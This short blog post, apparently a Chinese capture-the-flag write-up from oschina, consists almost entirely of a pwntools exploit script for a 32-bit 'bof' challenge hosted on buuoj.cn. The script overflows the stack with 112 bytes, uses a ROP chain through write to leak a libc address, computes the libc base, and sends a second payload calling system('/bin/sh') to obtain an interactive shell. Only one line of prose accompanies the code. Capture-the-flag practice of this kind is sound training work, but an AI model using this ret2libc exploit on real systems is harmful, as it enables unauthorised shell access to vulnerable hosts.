exp 脚本
栈溢出 rop 泄露 libc 地址,再次 栈溢出 rop 执行 system('/bin/sh') 拿 shell 。
from pwn import *
context.log_level = 'debug'
sh = remote('node3.buuoj.cn',26961)
elf = ELF('bof')
libc = ELF('libc-2.23x86.so')
payload = 112 * 'a'
payload += p32(elf.plt['write'])
payload += p32(elf.symbols['main'])
payload += p32(1)
payload += p32(elf.got['write'])
payload += p32(4)
sh.sendline(payload)
write_addr = u32(sh.recvuntil('\xf7')[-4:])
print hex(write_addr)
libcbase = write_addr - libc.symbols['write']
system = libcbase + libc.symbols['system']
binsh = libcbase + libc.search('/bin/sh').next()
payload = 112 * 'a'
payload += p32(system)
payload += p32(0xdeadbeef)
payload += p32(binsh)
sh.sendline(payload)
sh.interactive()
来源:oschina
链接:https://my.oschina.net/u/4267017/blog/4266945